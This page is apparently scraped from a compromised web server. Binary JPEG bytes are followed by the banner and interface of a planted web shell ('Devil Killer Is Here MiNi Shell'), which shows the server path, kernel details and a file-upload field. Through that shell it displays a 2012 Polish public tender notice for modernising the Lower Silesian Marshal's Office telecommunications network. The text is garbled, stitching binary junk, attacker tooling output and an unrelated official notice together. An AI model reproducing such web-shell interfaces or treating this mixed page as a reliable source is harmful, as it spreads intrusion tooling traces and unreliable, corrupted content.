JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120127/24299-N-2012.html

<p class="kh_header"><b>Wrocław: Modernizację sieci teleinformatycznej 
Urzędu Marszałkowskiego Województwa Dolnośląskiego</b><br>
<b>Numer ogłoszenia: 24299 - 2012; data zamieszczenia: 27.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Marszałkowski Województwa Dolnośląskiego , ul. Wybrzeże J. Słowackiego 12-14, 50-411 Wrocław, woj. dolnośląskie, tel. 71 7769643, faks 71 7769141, 7769702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizację sieci teleinformatycznej 
Urzędu Marszałkowskiego Województwa Dolnośląskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane podlegające na zaprojektowaniu i wykonaniu w ramach projektu pn. Modernizacja infrastruktury teleinformatycznej Urzędu Marszałkowskiego Województwa Dolnośląskiego, realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego na lata 2007-2013, nowej oraz modernizacji istniejącej infrastruktury telekomunikacyjnej na terenie budynków Urzędu Marszałkowskiego Województwa Dolnośląskiego we Wrocławiu przy ul. Wybrzeże Słowackiego 12-14, Mazowieckiej 15. Do przedmiotu zamówienia należy również dostarczenie i instalacja oprogramowania, urządzeń, wyposażenia pomieszczeń, migracja systemów i danych oraz przeprowadzenie dla pracowników Zamawiającego autoryzowanych szkoleń koniecznych do prawidłowej obsługi, zapewniającej trwałość gwarancji, dostarczonej oraz zmodernizowanej infrastruktury teleinformatycznej.
2.	Szczegółowy opis przedmiotu zamówienia oraz warunki jego realizacji Zamawiający określił w Istotnych Postanowieniach Umowy, które stanowią załącznik nr 7 do SIWZ.
3.	Kody według Wspólnego Słownika Zamówień (CPV): 
45.00.00.00-7 - roboty budowlane
71.30.00.00-1 - usługi inżynieryjne
71.32.00.00-7 - usługi inżynieryjne w zakresie projektowania
71.00.00.00-8 - usługi architektoniczne, budowlane, inżynieryjne i kontrolne
71.24.00.00-2 - usługi architektoniczne, inżynieryjne i planowania
71.25.00.00-5 - usługi architektoniczne, inżynieryjne i pomiarowe
71.33.00.00-0 - różne usługi inżynieryjne
45.11.11.00-9 - roboty w zakresie burzenia
45.45.30.00-7 - roboty remontowe i renowacyjne
45.26.25.22-6 - roboty murarskie
45.42.11.10-8 - instalowanie metalowych drzwi i ram okiennych
45.42.11.15-3 - instalowanie okien metalowych
45.42.11.14-6 - instalowanie drzwi metalowych
45.41.00.00-4 - tynkowanie 
45.44.21.00-8 - roboty malarskie
45.43.21.00-5 - podłoża i posadzki
45.43.21.11-5 - kładzenie wykładzin elastycznych
45.33.11.00-7 - instalacja centralnego ogrzewania
45.33.24.00-7 - roboty instalacyjne w zakresie sprzętu sanitarnego
45.33.12.30-7 - instalowanie sprzętu chłodniczego
45.31.00.00-3 - roboty w zakresie instalacji elektrycznych 
45.31.20.00-7 - instalowanie systemów alarmowych
45.31.41.20-8 - instalowanie linii telefonicznych
45.31.40.00-1 - instalowanie sprzętu telekomunikacyjnego
45.31.41.00-2 - instalowanie przełączeniowych central telefonicznych
45.31.42.00-3 - instalowanie infrastruktury kablowej
45.31.43.00-4 - kładzenie kabli
45.31.43.10-7 - instalowanie okablowania komputerowego
45.31.00.00-3 - roboty w zakresie instalacji elektrycznych 
45.31.10.00-0 - roboty w zakresie przewodów instalacji elektrycznych oraz opraw elektrycznych
45.31.11.00-1 - roboty w zakresie przewodów instalacji elektrycznej
45.31.12.00-2 - roboty w zakresie opraw elektrycznych
45.31.20.00-7 - instalowanie systemów alarmowych i anten
45.31.21.00-8 - instalowanie pożarowych systemów alarmowych
45.31.22.00-9 - instalowanie alarmów włamaniowych 
45.31.23.00-0 - instalowanie anten
45.43.22.10-9 - wykładanie ścian
45.42.11.46-9 - instalowanie sufitów podwieszanych
45.34.30.00-3 - roboty instalacyjne przeciwpożarowe
45.34.31.00-4 - roboty w zakresie umocnień przeciwogniowych
45.34.32.00-5 - instalowanie sprzętu gaśniczego
45.26.00.00-7 - roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne 
roboty specjalistyczne 
45.32.30.00-7 - izolacja dźwiękoszczelna 
45.23.24.52-5 - roboty odwadniające 
45.23.32.29-0 - konserwacja zadaszeń
45.23.32.50-6 - roboty w zakresie nawierzchni, z wyjątkiem dróg
45.43.21.21-8 - roboty w zakresie podłóg w pomieszczeniach komputerowych
44.21.22.63-0 - maszty kratowe
44.22.12.20-3 - drzwi przeciwpożarowe
48.82.20.00-6 - serwery komputerowe
80.53.31.00-0 - usługi szkolenia komputerowego
80.53.12.00-7 - usługi szkolenia technicznego
80.51.00.00-2 - usługi szkolenia specjalistycznego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 400.000,00 zł (słownie: czterysta tysięcy złotych 00/100). 2.Wadium może być wniesione w następujących formach: 1) pieniądzu, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3) gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007 r. Nr 42, poz. 275, ze zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznany zostanie za spełniony jeżeli Wykonawca wykaże że:
a)	w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia ich działalności jest krótszy - w tym okresie - wykonali projekt budowlany co najmniej jednego obiektu serwerowni lub centrum przetwarzania danych z zakresu budowy, przebudowy lub remontu obiektu budowlanego lub jego części, o wartości prac projektowych nie mniejszej niż  100 000,00 zł brutto, spełniający łącznie następujące warunki: 
-	powierzchnia użytkowa nie mniejsza niż 150 m2 lub kubatura nie mniejsza niż 400 m3,  
-	projekt obejmował co najmniej następujące instalacje:
-	klimatyzacji precyzyjnej,
-	systemu kontroli dostępu,
-	elektryczną podstawową i rezerwową,
-	system UPS i agregat prądotwórczy,
-	przeciwpożarową,
-	wentylacji,
-	sieci LAN i WAN,
-	szaf telekomunikacyjnych, 
-	antywłamaniową wraz z monitoringiem CCTV,
-	gaszenia gazem,
b)	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonali roboty budowlane dotyczące co najmniej jednego obiektu serwerowni lub centrum przetwarzania danych polegające na wybudowaniu, przebudowie lub remoncie obiektu budowlanego lub jego części, 
o wartości robót nie mniejszej niż 3.000.000,00 zł brutto, spełniające łącznie następujące warunki: 
-	powierzchnia użytkowa obiektu nie mniejsza niż 150 m2 lub kubatura obiektu nie mniejsza niż 400 m3,
-	obiekt wyposażony został co najmniej w następujące instalacje:
-	klimatyzacji precyzyjnej,
-	systemu kontroli dostępu,
-	elektryczną podstawową i rezerwową,
-	system UPS i agregat prądotwórczy,
-	przeciwpożarową,
-	wentylacji,
-	sieci LAN i WAN,
-	szaf telekomunikacyjnych,
-	antywłamaniową wraz z monitoringiem CCTV,
-	gaszenia gazem,
UWAGA: Zamawiający uzna za spełnione warunki, o których mowa w lit. a) i w lit. b), jeśli Wykonawca wykaże się zrealizowaniem zadań, o których mowa w lit. a) i w lit. b), w formule zaprojektuj i wybuduj w ramach jednego zamówienia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznany zostanie za spełniony jeżeli Wykonawca wykaże że:
dysponuje lub będzie dysponować następującymi osobami:
a)	kierownikiem budowy, który:
-posiada uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń do kierowania robotami budowlanymi oraz 
-posiada minimum 5-letnie doświadczenie zawodowe od dnia uzyskania uprawnień, 
-kierował co najmniej jedną robotą budowlaną w zakresie  budowy serwerowni lub Centrum Przetwarzania Danych, 
b)	osobami, które posiadają uprawnienia do projektowania w poniższych specjalnościach:
-konstrukcyjno-budowlanej oraz minimum 5-letnie doświadczenie zawodowe od dnia uzyskania stosownych uprawnień,
-telekomunikacyjnej oraz minimum 5-letnie doświadczenie zawodowe od dnia uzyskania stosownych uprawnień,
-instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych wodociągowych kanalizacyjnych oraz minimum 5-letnie doświadczenie zawodowe od dnia uzyskania stosownych uprawnień,
-instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych oraz minimum 5-letnie doświadczenie zawodowe od dnia uzyskania stosownych uprawnień.
Każda z ww. osób musi wykazać się doświadczeniem w projektowaniu co najmniej jednej serwerowni lub Centrum Przetwarzania Danych w ww. specjalnościach,
c)	kierownikiem projektu (który odpowiedzialny będzie za nadzór merytoryczny 
i organizacyjny nad realizacją przedmiotu zamówienia ze strony Wykonawcy, opracowanie zestawienia ryzyk przy realizacji przedmiotu zamówienia, kontrolę i koordynację pracy członków zespołu Wykonawcy, kontrolę zawartości merytorycznej opracowanych dokumentów, kontakty z Zamawiającym i innymi Wykonawcami, przygotowanie raportów) posiadającym:
-wykształcenie wyższe, techniczne o profilu informatycznym lub zbliżonym 
(np. elektronika, tele?komunikacja),
- certyfikat PMP (Project Management Professional) wydawany przez Project Management Institute lub PRINCE2 wydany przez Association of Project Management Group lub równoważny, (np. wydany przez IPMA - International Project Management Association). Przez certyfikat równoważny Zamawiający rozumie certyfikat, potwierdzający umiejętności zarządzania projektami.
-doświadczenie w kierowaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert minimum dwoma projektami polegającymi na  budowie serwerowni i/lub Centrum Przetwarzania Danych,
d)	specjalistą ds. zarządzania i zabezpieczania systemów informatycznych, ochrony informacji i audytów informatycznych (w tym audytów bezpieczeństwa) - posiadającym:
-wykształcenie wyższe techniczne o profilu informatycznym lub zbliżonym 
(np. elektronika, tele?komunikacja), 
-minimum 5-letnie doświadczenie zawodowe w branży informa?tycznej w zakresie zarządzania i zabezpieczania systemów informatycznych, ochrony informacji 
i audytów informatycznych, w tym doświadczenie w zakresie zarządzania bezpieczeństwem informacji,
e)	specjalistą ds. centrum przetwarzania danych posiadającym minimum 5-letnie doświadczenie zawodowe w branży informatycznej, w tym udział w co najmniej dwóch inwestycjach polegających na budowie serwerowni lub centrum przetwarzania danych 
o wartości minimum 3.000.000,00 zł brutto każda (dla wartości wykazanych przez Wykonawcę w walucie innej niż PLN, Zamawiający przyjmie przelicznik według średniego kursu NBP z dnia wszczęcia postępowania),
UWAGA: Zamawiający dopuszcza możliwość łączenia funkcji przez osoby przewidziane do realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznany zostanie za spełniony jeżeli Wykonawca wykaże że:
a)	posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 
3.000.000,00 zł, przy założeniu, że środki finansowe i zdolność kredytowa mogą być sumowane do wskazanej wysokości, a zdolność kredytowa to możliwość uzyskania nowego kredytu we wskazanej wysokości, przy uwzględnieniu wcześniej zaciągniętych zobowiązań kredytowych,
b)	posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, o wysokości sumy ubezpieczenia co najmniej 3.000.000,00 zł,
UWAGA: dla wartości wykazanych przez Wykonawcę w walucie innej niż PLN, Zamawiający przyjmie przelicznik według średniego kursu NBP z dnia wszczęcia niniejszego postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może zgodnie z art. 26 ust. 2c ustawy przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie warunku opisanego przez Zamawiającego w pkt III.3.5) ogłoszenia. Wykonawca przedstawiając wraz z ofertą inny dokument, o którym mowa powyżej, winien wskazać uzasadnioną przyczynę braku możliwości przedstawienia dokumentów dotyczących sytuacji ekonomicznej i finansowej, wskazanych w pkt III.4.1) ogłoszenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień zawartej Umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności z zastosowaniem art. 144 ust. 1 i 2 PZP, w przypadku:
a)	zmiany nazwy lub adresu, zmiany formy organizacyjno-prawnej, przekształcenia lub połączenia z inną firmą po stronie Wykonawcy,,
b)	zmiany terminów określonych w § 4 ust. 1 Umowy zgodnie z regułami określonymi w § 4 Umowy, przy czym termin określony w § 4 ust. 1 pkt. 3 Umowy nie może być późniejszy niż 30.11.2013r.,
c)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na termin realizacji Przedmiotu Umowy lub zmiana stawki podatku VAT,
d)	konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w szczególności instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację Umowy,
e)	konieczność wprowadzenia zmian będzie następstwem zmian wytycznych i zaleceń Instytucji Zarządzającej Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2007-2013.
2.	Warunkiem dokonania zmian, o których mowa powyżej jest złożenie wniosku przez Stronę inicjującą zmianę zawierającego:
1)	opis propozycji zmiany ,
2)	uzasadnienie zmiany,
3)	opis wpływu zmiany na Harmonogram.
3.	Zmiany Umowy, o których mowa w ust. 1, muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 PZP.
4.	Zmiana Umowy dokonana z naruszeniem powyższych zapisów jest nieważna.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.umwd.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Dolnośląskiego
Wybrzeże J. Słowackiego 12-14, 50-411 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2012 godzina 12:00, miejsce: Urząd Marszałkowski Województwa Dolnośląskiego
Wybrzeże J. Słowackiego 12-14, 50-411 Wrocław
pok. nr 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Projekt jest współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego oraz Budżetu Województwa Dolnośląskiego w ramach projektu Modernizacja infrastruktury teleinformatycznej Urzędu Marszałkowskiego Województwa Dolnośląskiego
2. 1.	Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5% ceny brutto oferty.
2.2.	Zabezpieczenie należytego wykonania umowy może być wniesione według wyboru Wykonawcy 
w jednej lub kilku następujących formach: 
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości..</p>
